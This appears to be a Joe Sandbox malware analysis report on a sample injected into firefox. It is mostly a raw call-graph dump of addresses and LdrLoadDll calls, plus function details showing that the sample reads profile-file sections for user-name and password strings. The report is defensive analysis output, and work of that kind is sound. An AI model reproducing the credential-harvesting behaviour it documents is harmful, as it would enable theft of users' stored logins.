20622241412 LdrLoadDll 5162->5165 5167 20622241baa 5162->5167 5162->5173 5164 20622241c51 5175 20622241c8d 5164->5175 5185 2062223e5d2 5164->5185 5165->5167 5167->5164 5167->5173 5181 2062223e3f2 5167->5181 5169 2062224228c 5189 2062223e652 5169->5189 5170 206222422d4 5193 2062223e552 5170->5193 5173->5151 5174 2062223e652 LdrLoadDll 5174->5173 5175->5169 5175->5170 5176 206222422fc 5176->5174 5178 2062223e4a3 5177->5178 5179 2062223e48c 5177->5179 5178->5162 5180 20622241412 LdrLoadDll 5179->5180 5180->5178 5182 2062223e41b 5181->5182 5184 2062223e434 5181->5184 5183 20622241412 LdrLoadDll 5182->5183 5183->5184 5184->5164 5186 2062223e60a 5185->5186 5187 2062223e621 5185->5187 5188 20622241412 LdrLoadDll 5186->5188 5187->5175 5188->5187 5190 2062223e69d 5189->5190 5191 2062223e684 5189->5191 5190->5173 5192 20622241412 LdrLoadDll 5191->5192 5192->5190 5194 2062223e559 5193->5194 5195 20622241412 LdrLoadDll 5194->5195 5196 2062223e59e 5194->5196 5195->5196 5196->5176 5462 206222390ee 5463 20622239109 5462->5463 5467 206222391af 5462->5467 5464 20622239012 LdrLoadDll 5463->5464 5465 20622239118 5464->5465 5466 20622241a52 LdrLoadDll 5465->5466 5466->5467 5382 206222394b3 5383 2062223952a 5382->5383 5384 2062223f4e2 LdrLoadDll 5383->5384 5385 2062223953a 5384->5385 5386 2062223f4e2 LdrLoadDll 5385->5386 5397 2062223961b 5385->5397 5387 2062223955e 5386->5387 5388 20622241412 LdrLoadDll 5387->5388 5387->5397 5389 20622239587 5388->5389 5390 20622241412 LdrLoadDll 5389->5390 5391 206222395ab 5390->5391 5392 20622241412 LdrLoadDll 5391->5392 5393 206222395cf 5392->5393 5394 20622241412 LdrLoadDll 5393->5394 5395 206222395f7 5394->5395 5396 20622241412 LdrLoadDll 5395->5396 5396->5397 5201 20622239272 5202 20622241412 LdrLoadDll 5201->5202 5205 206222392aa 5202->5205 5203 2062223934e 5205->5203 5207 206222390f2 LdrLoadDll 5205->5207 5208 20622239cb2 5205->5208 5222 206222405b2 5205->5222 5207->5205 5209 20622239cdb 5208->5209 5221 20622239d49 5208->5221 5210 20622240d02 2 API calls 5209->5210 5209->5221 5211 20622239d16 5210->5211 5217 20622239d45 5211->5217 5228 20622239902 5211->5228 5212 20622240d02 2 API calls 5214 20622239d6a 5212->5214 5218 2062223f4e2 LdrLoadDll 5214->5218 5214->5221 5215 20622239d36 5215->5217 5237 206222397d2 5215->5237 5217->5212 5217->5221 5219 20622239dd0 5218->5219 5220 20622241412 LdrLoadDll 5219->5220 5220->5221 5221->5205 5224 206222405e8 5222->5224 5223 20622240648 5226 206222406a9 5223->5226 5227 20622241a52 LdrLoadDll 5223->5227 5224->5223 5225 20622241a52 LdrLoadDll 5224->5225 5225->5224 5226->5205 5227->5223 5229 20622239ca0 5228->5229 5230 2062223992a 5228->5230 5229->5215 5230->5229 5231 20622240d02 2 API calls 5230->5231 5233 20622239a79 5231->5233 5232 20622239c5f 5232->5215 5233->5232 5234 20622240d02 2 API calls 5233->5234 5235 20622239c49 5234->5235 5236 20622240d02 2 API calls 5235->5236 5236->5232 5238 206222397f0 5237->5238 5239 20622239804 5237->5239 5238->5217 5240 20622240d02 2 API calls 5239->5240 5241 206222398c6 5240->5241 5241->5217 5555 2062224073b 5556 2062223f672 LdrLoadDll 5555->5556 5557 206222407ba 5556->5557 5558 20622241637 5560 20622241538 5558->5560 5563 2062224163f 5558->5563 5559 2062224153d 5560->5559 5561 20622241982 LdrLoadDll 5560->5561 5561->5559 5562 206222416e2 5563->5562 5564 2062223f4e2 LdrLoadDll 5563->5564 5565 2062224171d 5564->5565 5565->5562 5567 20622242a32 LdrLoadDll 5565->5567 5568 20622241783 5565->5568 5566 20622241801 5567->5568 5568->5566 5569 20622241982 LdrLoadDll 5568->5569 5569->5566 5468 206222398fb 5469 20622239ca0 5468->5469 5470 2062223992a 5468->5470 5470->5469 5471 20622240d02 2 API calls 5470->5471 5472 20622239a79 5471->5472 5473 20622240d02 2 API calls 5472->5473 5476 20622239c5f 5472->5476 5474 20622239c49 5473->5474 5475 20622240d02 2 API calls 5474->5475 5475->5476 5242 2062223ba81 5243 206222394b2 LdrLoadDll 5242->5243 5244 2062223ba94 5243->5244 5253 2062223d5e2 5244->5253 5247 206222390f2 LdrLoadDll 5248 2062223baa4 5247->5248 5249 20622241412 LdrLoadDll 5248->5249 5251 2062223baf1 5249->5251 5250 2062223bb17 5251->5250 5259 206222391c2 5251->5259 5254 2062223d623 5253->5254 5267 2062223d492 5254->5267 5256 2062223d698 5256->5256 5271 2062223e4d2 5256->5271 5260 20622239267 5259->5260 5261 206222391df 5259->5261 5260->5251 5262 20622239cb2 2 API calls 5261->5262 5263 20622239208 5261->5263 5262->5263 5263->5260 5264 206222405b2 LdrLoadDll 5263->5264 5265 2062223925f 5264->5265 5266 206222390f2 LdrLoadDll 5265->5266 5266->5260 5268 2062223d4be 5267->5268 5275 2062223cb72 5268->5275 5270 2062223d4cb 5270->5256 5272 2062223ba9c 5271->5272 5273 2062223e50d 5271->5273 5272->5247 5274 20622241412 LdrLoadDll 5273->5274 5274->5272 5276 2062223cbe4 5275->5276 5277 2062223f4e2 LdrLoadDll 5276->5277 5278 2062223cc18 5277->5278 5279 20622241412 LdrLoadDll 5278->5279 5280 2062223cc35 5279->5280 5280->5270 5477 2062223b100 5478 2062223b12d 5477->5478 5479 2062223e0a2 LdrLoadDll 5478->5479 5480 2062223b14a 5479->5480 5481 2062223f4e2 LdrLoadDll 5480->5481 5484 2062223b1bb 5480->5484 5482 2062223b19b 5481->5482 5483 20622241412 LdrLoadDll 5482->5483 5483->5484 5398 206222391bf 5399 20622239267 5398->5399 5400 206222391df 5398->5400 5401 20622239cb2 2 API calls 5400->5401 5402 20622239208 5400->5402 5401->5402 5402->5399 5403 206222405b2 LdrLoadDll 5402->5403 5404 2062223925f 5403->5404 5405 206222390f2 LdrLoadDll 5404->5405 5405->5399 5485 2062223c2ff 5486 2062223c31b 5485->5486 5487 2062223c496 5485->5487 5486->5487 5488 20622241412 LdrLoadDll 5486->5488 5489 2062223c343 5488->5489 5490 20622241412 LdrLoadDll 5489->5490 5491 2062223c360 5490->5491 5492 20622241412 LdrLoadDll 5491->5492 5493 2062223c37d 5492->5493 5494 20622241412 LdrLoadDll 5493->5494 5495 2062223c39a 5494->5495 5496 20622241412 LdrLoadDll 5495->5496 5497 2062223c3b7 5496->5497 5498 20622241412 LdrLoadDll 5497->5498 5499 2062223c3d4 5498->5499 5500 20622241412 LdrLoadDll 5499->5500 5501 2062223c3f1 5500->5501 5502 20622241412 LdrLoadDll 5501->5502 5503 2062223c40e 5502->5503 5504 20622241412 LdrLoadDll 5503->5504 5505 2062223c42b 5504->5505 5506 20622241412 LdrLoadDll 5505->5506 5507 2062223c448 5506->5507 5508 20622241412 LdrLoadDll 5507->5508 5509 2062223c465 5508->5509 5510 20622241412 LdrLoadDll 5509->5510 5511 2062223c482 5510->5511 5281 20622241980 5282 20622241642 LdrLoadDll 5281->5282 5283 20622241997 5281->5283 5282->5283 5284 20622241412 LdrLoadDll 5283->5284 5285 20622241a11 5283->5285 5284->5285 5410 2062223bdc3 5413 2062223be0f 5410->5413 5411 2062223bf1f 5412 2062223bb22 2 API calls 5411->5412 5416 2062223bf12 5412->5416 5413->5411 5414 2062223bece 5413->5414 5415 2062223bb22 2 API calls 5414->5415 5415->5416 5570 20622240c40 5571 20622240c5c 5570->5571 5572 20622241412 LdrLoadDll 5571->5572 5575 20622240cb0 5571->5575 5573 20622240c87 5572->5573 5574 20622241412 LdrLoadDll 5573->5574 5574->5575 5417 2062224298a 5418 206222429b3 5417->5418 5422 206222429a6 5417->5422 5419 20622241412 LdrLoadDll 5418->5419 5420 206222429c9 5419->5420 5421 20622241412 LdrLoadDll 5420->5421 5420->5422 5421->5422 5576 2062224140c 5577 2062224162b 5576->5577 5579 20622241437 5576->5579 5578 2062224144e 5579->5578 5580 20622241982 LdrLoadDll 5579->5580 5580->5578 5581 2062223ff06 5582 2062223ff3b 5581->5582 5583 2062223e0a2 LdrLoadDll 5582->5583 5584 2062223ff44 5583->5584 5585 20622241412 LdrLoadDll 5584->5585 5613 20622240422 5584->5613 5586 2062223ffe5 5585->5586 5587 20622241412 LdrLoadDll 5586->5587 5588 2062224000d 5587->5588 5589 20622241412 LdrLoadDll 5588->5589 5588->5613 5590 20622240052 5589->5590 5591 20622241412 LdrLoadDll 5590->5591 5593 206222400af 5591->5593 5592 206222400bf 5593->5592 5594 20622241412 LdrLoadDll 5593->5594 5595 20622240132 5594->5595 5595->5592 5596 206222401ab 5595->5596 5597 20622240160 5595->5597 5598 20622241412 LdrLoadDll 5596->5598 5600 2062223fcb2 LdrLoadDll 5597->5600 5599 206222401cc 5598->5599 5602 206222401dd 5599->5602 5603 20622241412 LdrLoadDll 5599->5603 5601 2062224019f 5600->5601 5604 2062224022a 5603->5604 5605 20622241412 LdrLoadDll 5604->5605 5606 2062224025a 5605->5606 5607 20622240335 5606->5607 5608 2062223ab22 LdrLoadDll 5606->5608 5610 206222402e2 5606->5610 5609 2062223fa82 LdrLoadDll 5607->5609 5608->5607 5609->5610 5612 20622241412 LdrLoadDll 5610->5612 5614 20622240376 5610->5614 5611 20622241412 LdrLoadDll 5611->5613 5612->5614 5614->5611 5615 20622243909 5616 2062224390e 5615->5616 5617 206222436f2 4 API calls 5616->5617 5618 20622243913 5617->5618 5516 206222397ce 5517 206222397f0 5516->5517 5518 20622239804 5516->5518 5519 20622240d02 2 API calls 5518->5519 5520 206222398c6 5519->5520 5298 2062223a359 5299 2062223a36b 5298->5299 5300 2062223f4e2 LdrLoadDll 5299->5300 5335 2062223a843 5299->5335 5301 2062223a4b3 5300->5301 5302 20622241412 LdrLoadDll 5301->5302 5303 2062223a4d7 5302->5303 5304 20622241412 LdrLoadDll 5303->5304 5305 2062223a4ff 5304->5305 5306 20622241412 LdrLoadDll 5305->5306 5305->5335 5307 2062223a54a 5306->5307 5308 2062223f4e2 LdrLoadDll 5307->5308 5307->5335 5309 2062223a5a1 5308->5309 5310 2062223f4e2 LdrLoadDll 5309->5310 5311 2062223a5b9 5310->5311 5312 20622241412 LdrLoadDll 5311->5312 5313 2062223a5e6 5312->5313 5314 20622241412 LdrLoadDll 5313->5314 5315 2062223a613 5314->5315 5316 20622241412 LdrLoadDll 5315->5316 5315->5335 5317 2062223a64e 5316->5317 5318 20622242992 LdrLoadDll 5317->5318 5319 2062223a662 5318->5319 5320 2062223f672 LdrLoadDll 5319->5320 5319->5335 5321 2062223a713 5320->5321 5322 20622241412 LdrLoadDll 5321->5322 5323 2062223a76e 5322->5323 5324 20622241412 LdrLoadDll 5323->5324 5325 2062223a792 5324->5325 5326 20622241412 LdrLoadDll 5325->5326 5327 2062223a7b6 5326->5327 5328 20622241412 LdrLoadDll 5327->5328 5329 2062223a7da 5328->5329 5330 20622241412 LdrLoadDll 5329->5330 5331 2062223a7fe 5330->5331 5332 20622241412 LdrLoadDll 5331->5332 5333 2062223a82f 5332->5333 5334 20622242992 LdrLoadDll 5333->5334 5334->5335 5619 2062223ab17 5620 2062223ab09 5619->5620 5621 2062223a9c2 LdrLoadDll 5620->5621 5626 2062223ab0e 5620->5626 5622 2062223ac3f 5621->5622 5623 2062223a9c2 LdrLoadDll 5622->5623 5622->5626 5624 2062223ac54 5623->5624 5625 2062223a9c2 LdrLoadDll 5624->5625 5624->5626 5625->5626 5423 2062223e096 5424 2062223e0d8 5423->5424 5425 20622241412 LdrLoadDll 5424->5425 5426 2062223e167 5425->5426 5336 20622242758 5337 20622242762 5336->5337 5338 20622242770 5337->5338 5341 2062224277c 5337->5341 5339 2062223ff12 LdrLoadDll 5338->5339 5340 20622242775 5339->5340 5342 2062223e0a2 LdrLoadDll 5341->5342 5346 206222428fa 5341->5346 5343 206222427dc 5342->5343 5344 2062223a362 LdrLoadDll 5343->5344 5343->5346 5345 206222427ec 5344->5345 5345->5346 5347 2062224280d 5345->5347 5349 2062224281a 5345->5349 5353 20622242815 5345->5353 5348 206222408a2 LdrLoadDll 5347->5348 5348->5353 5350 206222394b2 LdrLoadDll 5349->5350 5349->5353 5351 20622242835 5350->5351 5352 206222408a2 LdrLoadDll 5351->5352 5354 2062224283d 5352->5354 5353->5346 5355 2062223c812 3 API calls 5353->5355 5356 20622242894 5354->5356 5361 2062224285f 5354->5361 5357 206222428d9 5355->5357 5360 20622239372 LdrLoadDll 5356->5360 5358 20622241412 LdrLoadDll 5357->5358 5359 206222428f6 ExitProcess 5358->5359 5360->5353 5362 2062223f4e2 LdrLoadDll 5361->5362 5363 20622242872 5362->5363 4803 20622242762 4804 2062224276b 4803->4804 4805 20622242770 4804->4805 4809 2062224277c 4804->4809 4897 2062223ff12 4805->4897 4807 20622242775 4808 206222428fa 4809->4808 4831 2062223e0a2 4809->4831 4811 206222427dc 4811->4808 4835 2062223a362 4811->4835 4814 2062224280d 4931 206222408a2 4814->4931 4816 2062224281a 4817 20622242815 4816->4817 4952 206222394b2 4816->4952 4817->4808 4873 2062223c812 4817->4873 4819 20622242835 4820 206222408a2 LdrLoadDll 4819->4820 4821 2062224283d 4820->4821 4823 20622242894 4821->4823 4828 2062224285f 4821->4828 4972 20622239372 4823->4972 4826 206222428f6 ExitProcess 4968 2062223f4e2 4828->4968 4830 20622242872 4832 2062223e0d8 4831->4832 4833 20622241412 LdrLoadDll 4832->4833 4834 2062223e167 4833->4834 4834->4811 4836 2062223a394 4835->4836 4837 2062223f4e2 LdrLoadDll 4836->4837 4872 2062223a843 4836->4872 4838 2062223a4b3 4837->4838 4839 20622241412 LdrLoadDll 4838->4839 4840 2062223a4d7 4839->4840 4841 20622241412 LdrLoadDll 4840->4841 4842 2062223a4ff 4841->4842 4843 20622241412 LdrLoadDll 4842->4843 4842->4872 4844 2062223a54a 4843->4844 4845 2062223f4e2 LdrLoadDll 4844->4845 4844->4872 4846 2062223a5a1 4845->4846 4847 2062223f4e2 LdrLoadDll 4846->4847 4848 2062223a5b9 4847->4848 4849 20622241412 LdrLoadDll 4848->4849 4850 2062223a5e6 4849->4850 4851 20622241412 LdrLoadDll 4850->4851 4852 2062223a613 4851->4852 4853 20622241412 LdrLoadDll 4852->4853 4852->4872 4854 2062223a64e 4853->4854 4975 20622242992 4854->4975 4856 2062223a662 4856->4872 4981 2062223f672 4856->4981 4858 2062223a713 4859 20622241412 LdrLoadDll 4858->4859 4860 2062223a76e 4859->4860 4861 20622241412 LdrLoadDll 4860->4861 4862 2062223a792 4861->4862 4863 20622241412 LdrLoadDll 4862->4863 4864 2062223a7b6 4863->4864 4865 20622241412 LdrLoadDll 4864->4865 4866 2062223a7da 4865->4866 4867 20622241412 LdrLoadDll 4866->4867 4868 2062223a7fe 4867->4868 4869 20622241412 LdrLoadDll 4868->4869 4870 2062223a82f 4869->4870 4871 20622242992 LdrLoadDll 4870->4871 4871->4872 4872->4808 4872->4814 4872->4816 4872->4817 4874 20622242992 LdrLoadDll 4873->4874 4875 2062223c8c7 4874->4875 4876 20622242992 LdrLoadDll 4875->4876 4877 2062223c8db 4876->4877 4878 2062223ca6f 4877->4878 4879 2062223f4e2 LdrLoadDll 4877->4879 4892 20622241412 4878->4892 4880 2062223c91f 4879->4880 4985 2062223c302 4880->4985 4882 2062223c940 4882->4878 4883 2062223f4e2 LdrLoadDll 4882->4883 4884 2062223c9cf 4883->4884 4884->4878 4885 20622241412 LdrLoadDll 4884->4885 4886 2062223c9f1 4885->4886 4886->4878 5012 2062223c4b2 4886->5012 4891 20622240c42 LdrLoadDll 4891->4878 4893 2062224162b 4892->4893 4895 20622241437 4892->4895 4893->4826 4894 2062224144e 4894->4826 4895->4894 5082 20622241982 4895->5082 4898 2062223ff3b 4897->4898 4899 2062223e0a2 LdrLoadDll 4898->4899 4900 2062223ff44 4899->4900 4901 20622241412 LdrLoadDll 4900->4901 4929 20622240422 4900->4929 4902 2062223ffe5 4901->4902 4903 20622241412 LdrLoadDll 4902->4903 4904 2062224000d 4903->4904 4905 20622241412 LdrLoadDll 4904->4905 4904->4929 4906 20622240052 4905->4906 4907 20622241412 LdrLoadDll 4906->4907 4909 206222400af 4907->4909 4908 206222400bf 4908->4807 4909->4908 4910 20622241412 LdrLoadDll 4909->4910 4911 20622240132 4910->4911 4911->4908 4912 206222401ab 4911->4912 4913 20622240160 4911->4913 4914 20622241412 LdrLoadDll 4912->4914 5100 2062223fcb2 4913->5100 4915 206222401cc 4914->4915 4918 206222401dd 4915->4918 4919 20622241412 LdrLoadDll 4915->4919 4918->4807 4920 2062224022a 4919->4920 4921 20622241412 LdrLoadDll 4920->4921 4922 2062224025a 4921->4922 4923 20622240335 4922->4923 4926 206222402e2 4922->4926 5112 2062223ab22 4922->5112 5120 2062223fa82 4923->5120 4928 20622241412 LdrLoadDll 4926->4928 4930 20622240376 4926->4930 4927 20622241412 LdrLoadDll 4927->4929 4928->4930 4929->4807 4930->4927 4933 206222408cf 4931->4933 4932 20622240c2c 4932->4817 4933->4932 4934 20622241412 LdrLoadDll 4933->4934 4935 2062224092d 4934->4935 4936 20622241412 LdrLoadDll 4935->4936 4937 2062224095e 4936->4937 4938 20622241412 LdrLoadDll 4937->4938 4939 2062224098f 4938->4939 4944 20622240beb 4939->4944 5132 2062223f7c2 4939->5132 4941 20622240af5 5136 20622240742 4941->5136 4943 20622240b11 4943->4944 4945 20622241412 LdrLoadDll 4943->4945 4944->4817 4946 20622240b60 4945->4946 4947 20622241412 LdrLoadDll 4946->4947 4948 20622240b8d 4947->4948 4949 20622241412 LdrLoadDll 4948->4949 4950 20622240bbc 4949->4950 4951 20622241412 LdrLoadDll 4950->4951 4951->4944 4953 206222394b3 4952->4953 4954 2062223f4e2 LdrLoadDll 4953->4954 4955 2062223953a 4954->4955 4956 2062223f4e2 LdrLoadDll 4955->4956 4967 2062223961b 4955->4967 4957 2062223955e 4956->4957 4958 20622241412 LdrLoadDll 4957->4958 4957->4967 4959 20622239587 4958->4959 4960 20622241412 LdrLoadDll 4959->4960 4961 206222395ab 4960->4961 4962 20622241412 LdrLoadDll 4961->4962 4963 206222395cf 4962->4963 4964 20622241412 LdrLoadDll 4963->4964 4965 206222395f7 4964->4965 4966 20622241412 LdrLoadDll 4965->4966 4966->4967 4967->4819 4969 2062223f50a 4968->4969 4970 2062223f54a LdrLoadDll 4969->4970 4971 2062223f50e 4969->4971 4970->4971 4971->4830 4973 20622241412 LdrLoadDll 4972->4973 4974 206222393a0 4973->4974 4974->4817 4976 206222429b3 4975->4976 4980 206222429a6 4975->4980 4977 20622241412 LdrLoadDll 4976->4977 4978 206222429c9 4977->4978 4979 20622241412 LdrLoadDll 4978->4979 4978->4980 4979->4980 4980->4856 4982 2062223f6a6 4981->4982 4983 20622241412 LdrLoadDll 4982->4983 4984 2062223f6ee 4983->4984 4984->4858 4986 2062223c31b 4985->4986 4987 2062223c496 4985->4987 4986->4987 4988 20622241412 LdrLoadDll 4986->4988 4987->4882 4989 2062223c343 4988->4989 4990 20622241412 LdrLoadDll 4989->4990 4991 2062223c360 4990->4991 4992 20622241412 LdrLoadDll 4991->4992 4993 2062223c37d 4992->4993 4994 20622241412 LdrLoadDll 4993->4994 4995 2062223c39a 4994->4995 4996 20622241412 LdrLoadDll 4995->4996 4997 2062223c3b7 4996->4997 4998 20622241412 LdrLoadDll 4997->4998 4999 2062223c3d4 4998->4999 5000 20622241412 LdrLoadDll 4999->5000 5001 2062223c3f1 5000->5001 5002 20622241412 LdrLoadDll 5001->5002 5003 2062223c40e 5002->5003 5004 20622241412 LdrLoadDll 5003->5004 5005 2062223c42b 5004->5005 5006 20622241412 LdrLoadDll 5005->5006 5007 2062223c448 5006->5007 5008 20622241412 LdrLoadDll 5007->5008 5009 2062223c465 5008->5009 5010 20622241412 LdrLoadDll 5009->5010 5011 2062223c482 5010->5011 5011->4882 5013 2062223f672 LdrLoadDll 5012->5013 5014 2062223c5a9 5013->5014 5015 20622241412 LdrLoadDll 5014->5015 5016 2062223c65b 5015->5016 5017 20622241412 LdrLoadDll 5016->5017 5018 2062223c681 5017->5018 5019 2062223c7f2 5018->5019 5020 2062223c6a0 GetPrivateProfileSectionNamesW 5018->5020 5025 20622240c42 5019->5025 5021 2062223c6bd 5020->5021 5031 2062223bb22 5021->5031 5023 2062223c6dd 5023->5019 5035 2062223bf62 5023->5035 5026 20622240c5c 5025->5026 5027 20622241412 LdrLoadDll 5026->5027 5030 2062223ca60 5026->5030 5028 20622240c87 5027->5028 5029 20622241412 LdrLoadDll 5028->5029 5029->5030 5030->4891 5032 2062223bb73 5031->5032 5034 2062223bcda 5032->5034 5044 20622240d02 5032->5044 5034->5023 5036 2062223bfb0 5035->5036 5037 20622240d02 2 API calls 5036->5037 5041 2062223c0dc 5037->5041 5038 2062223c2e2 5038->5023 5039 2062223c2c3 5040 20622240c42 LdrLoadDll 5039->5040 5040->5038 5041->5038 5041->5039 5042 2062223bb22 LdrLoadDll NtCreateFile 5041->5042 5043 2062223bdd2 LdrLoadDll NtCreateFile 5041->5043 5042->5041 5043->5041 5045 2062224138d 5044->5045 5046 20622240d2c 5044->5046 5045->5034 5046->5045 5047 20622240dc0 5046->5047 5048 20622241412 LdrLoadDll 5046->5048 5049 20622240e04 5047->5049 5050 20622240e71 5047->5050 5065 20622240e2f 5047->5065 5048->5047 5054 20622241412 LdrLoadDll 5049->5054 5049->5065 5051 20622240e99 5050->5051 5052 20622241412 LdrLoadDll 5050->5052 5053 20622240ee0 NtCreateFile 5051->5053 5055 20622241412 LdrLoadDll 5051->5055 5051->5065 5052->5051 5056 20622240c42 LdrLoadDll 5053->5056 5054->5065 5057 20622240ed0 5055->5057 5058 20622240f2d 5056->5058 5057->5053 5057->5065 5059 20622241412 LdrLoadDll 5058->5059 5060 20622240f7e 5058->5060 5058->5065 5059->5060 5061 2062224102e 5060->5061 5062 20622240fd0 5060->5062 5060->5065 5063 206222410e6 5061->5063 5064 20622241037 5061->5064 5062->5065 5068 20622241412 LdrLoadDll 5062->5068 5066 20622241188 5063->5066 5067 206222410ef 5063->5067 5064->5065 5070 20622241412 LdrLoadDll 5064->5070 5065->5034 5071 2062224118d 5066->5071 5072 20622241209 5066->5072 5069 20622241117 5067->5069 5073 20622241412 LdrLoadDll 5067->5073 5068->5065 5069->5065 5074 20622242992 LdrLoadDll 5069->5074 5070->5065 5071->5065 5077 20622241412 LdrLoadDll 5071->5077 5075 20622241212 5072->5075 5076 20622241294 5072->5076 5073->5069 5074->5065 5075->5065 5078 20622241412 LdrLoadDll 5075->5078 5076->5065 5079 20622241412 LdrLoadDll 5076->5079 5080 206222412c5 5076->5080 5077->5065 5078->5065 5079->5080 5080->5065 5081 20622241412 LdrLoadDll 5080->5081 5081->5065 5087 20622241642 5082->5087 5084 20622241997 5085 20622241412 LdrLoadDll 5084->5085 5086 20622241a11 5084->5086 5085->5086 5086->4894 5088 20622241674 5087->5088 5089 206222416e2 5088->5089 5090 2062223f4e2 LdrLoadDll 5088->5090 5089->5084 5091 2062224171d 5090->5091 5091->5089 5094 20622241783 5091->5094 5096 20622242a32 5091->5096 5092 20622241801 5092->5084 5094->5092 5095 20622241982 LdrLoadDll 5094->5095 5095->5092 5097 20622242a47 5096->5097 5098 20622242a5d 5096->5098 5099 20622241412 LdrLoadDll 5097->5099 5098->5094 5099->5098 5101 2062223fcfe 5100->5101 5102 20622241412 LdrLoadDll 5101->5102 5111 2062223fe56 5101->5111 5103 2062223fd6f 5102->5103 5104 2062223fa82 LdrLoadDll 5103->5104 5103->5111 5105 2062223fd92 5104->5105 5106 20622241412 LdrLoadDll 5105->5106 5105->5111 5107 2062223fe29 5106->5107 5108 20622241412 LdrLoadDll 5107->5108 5107->5111 5109 2062223fe7c 5108->5109 5110 20622241412 LdrLoadDll 5109->5110 5109->5111 5110->5111 5111->4807 5114 2062223ab3e 5112->5114 5113 2062223ac69 5113->4923 5114->5113 5128 2062223a9c2 5114->5128 5116 2062223ac3f 5116->5113 5117 2062223a9c2 LdrLoadDll 5116->5117 5118 2062223ac54 5117->5118 5118->5113 5119 2062223a9c2 LdrLoadDll 5118->5119 5119->5113 5121 2062223fac7 5120->5121 5121->5121 5122 20622241412 LdrLoadDll 5121->5122 5123 2062223fb0d 5122->5123 5124 20622241412 LdrLoadDll 5123->5124 5125 2062223fb36 5124->5125 5126 20622241412 LdrLoadDll 5125->5126 5127 2062223fb91 5125->5127 5126->5127 5127->4926 5129 2062223aa1c 5128->5129 5130 20622241412 LdrLoadDll 5129->5130 5131 2062223aa35 5130->5131 5131->5116 5133 2062223f80d 5132->5133 5134 20622241412 LdrLoadDll 5133->5134 5135 2062223f900 5134->5135 5135->4941 5137 2062223f672 LdrLoadDll 5136->5137 5138 206222407ba 5136->5138 5137->5138 5138->4943 5529 206222434e3 5530 206222434ed 5529->5530 5533 20622239f72 5530->5533 5532 20622243510 5534 20622239f91 5533->5534 5537 20622239faa 5533->5537 5535 206222390f2 LdrLoadDll 5534->5535 5536 20622239f99 5535->5536 5536->5532 5537->5532 5538 206222438e5 5539 206222438f7 5538->5539 5542 206222436f2 5539->5542 5541 206222438fc 5543 20622243707 5542->5543 5544 20622242762 4 API calls 5542->5544 5543->5541 5544->5543 5364 20622239363 5365 20622239367 5364->5365 5366 20622241412 LdrLoadDll 5365->5366 5367 206222393a0 5365->5367 5366->5367 5545 2062223d5e0 5546 2062223d5e3 5545->5546 5547 2062223d492 LdrLoadDll 5546->5547 5548 2062223d698 5547->5548 5549 2062223e4d2 LdrLoadDll 5548->5549 5550 2062223e081 5549->5550

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 000002062223C4B2, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamesPrivateProfileSection
                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                      • API String ID: 709140578-2058692283
                                                                                                                                                      • Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                      • Instruction ID: 4ab9bf8dd74ef3dcd83a26a31586f2d600d68021fe0f7e145c99cc22837a463c
                                                                                                                                                      • Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                      • Instruction Fuzzy Hash: 0BA1A070618748CFEB19EF6894487EEB7E1FB98300F00462DE84AD7292DF719655C785
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0000020622240D02, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 48 20622240d02-20622240d26 49 20622240d2c-20622240d30 48->49 50 2062224138d-2062224139d 48->50 49->50 51 20622240d36-20622240d70 49->51 52 20622240d72-20622240d76 51->52 53 20622240d8f 51->53 52->53 55 20622240d78-20622240d7c 52->55 54 20622240d96 53->54 56 20622240d9b-20622240d9f 54->56 57 20622240d84-20622240d88 55->57 58 20622240d7e-20622240d82 55->58 59 20622240dc9-20622240ddb 56->59 60 20622240da1-20622240dc7 call 20622241412 56->60 57->56 61 20622240d8a-20622240d8d 57->61 58->54 65 20622240e48 59->65 66 20622240ddd-20622240e02 59->66 60->59 60->65 61->56 67 20622240e4a-20622240e70 65->67 68 20622240e04-20622240e0b 66->68 69 20622240e71-20622240e78 66->69 72 20622240e0d-20622240e30 call 20622241412 68->72 73 20622240e36-20622240e40 68->73 70 20622240e7a-20622240ea3 call 20622241412 69->70 71 20622240ea5-20622240eac 69->71 70->65 70->71 75 20622240eae-20622240eda call 20622241412 71->75 76 20622240ee0-20622240f28 NtCreateFile call 20622240c42 71->76 72->73 73->65 78 20622240e42-20622240e43 73->78 75->65 75->76 84 20622240f2d-20622240f2f 76->84 78->65 84->65 85 20622240f35-20622240f3d 84->85 85->65 86 20622240f43-20622240f46 85->86 87 20622240f56-20622240f5d 86->87 88 20622240f48-20622240f51 86->88 89 20622240f92-20622240fbc 87->89 90 20622240f5f-20622240f88 call 20622241412 87->90 88->67 96 20622240fc2-20622240fc5 89->96 97 2062224137e-20622241388 89->97 90->65 95 20622240f8e-20622240f8f 90->95 95->89 98 20622240fcb-20622240fce 96->98 99 206222410d4-206222410e1 96->99 97->65 101 2062224102e-20622241031 98->101 102 20622240fd0-20622240fd7 98->102 99->67 103 206222410e6-206222410e9 101->103 104 20622241037-20622241042 101->104 105 20622241008-20622241029 102->105 106 20622240fd9-20622241002 call 20622241412 102->106 108 20622241188-2062224118b 103->108 109 206222410ef-206222410f6 103->109 111 20622241073-20622241076 104->111 112 20622241044-2062224106d call 20622241412 104->112 110 206222410b9-206222410ca 105->110 106->65 106->105 119 2062224118d-20622241194 108->119 120 20622241209-2062224120c 108->120 115 20622241127-2062224113b call 20622242992 109->115 116 206222410f8-20622241121 call 20622241412 109->116 110->99 111->65 118 2062224107c-20622241086 111->118 112->65 112->111 115->65 137 20622241141-20622241183 115->137 116->65 116->115 118->65 126 2062224108c-206222410b6 